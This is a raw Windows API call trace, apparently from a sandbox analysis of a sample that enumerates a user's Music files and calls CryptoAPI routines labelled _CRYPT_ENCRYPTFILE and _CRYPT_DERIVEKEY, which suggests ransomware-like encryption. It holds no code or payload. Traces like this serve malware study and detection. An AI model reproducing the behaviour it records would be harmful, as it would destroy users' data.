HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.208] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.209] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0113.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0113.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.210] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6269c470, ftCreationTime.dwHighDateTime=0x1d5e1fa, ftLastAccessTime.dwLowDateTime=0x6f35fe70, ftLastAccessTime.dwHighDateTime=0x1d5e868, ftLastWriteTime.dwLowDateTime=0x6f35fe70, ftLastWriteTime.dwHighDateTime=0x1d5e868, nFileSizeHigh=0x0, nFileSizeLow=0x14149, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="_lDKW-L4K_DTCAjQT1.wav", cAlternateFileName="_LDKW-~1.WAV")) returned 0x41ac500 [0113.210] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.211] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.211] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.211] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.212] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0113.212] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.212] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.213] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0113.213] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0113.213] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.213] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0113.214] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0113.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0113.267] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0113.268] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0113.268] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 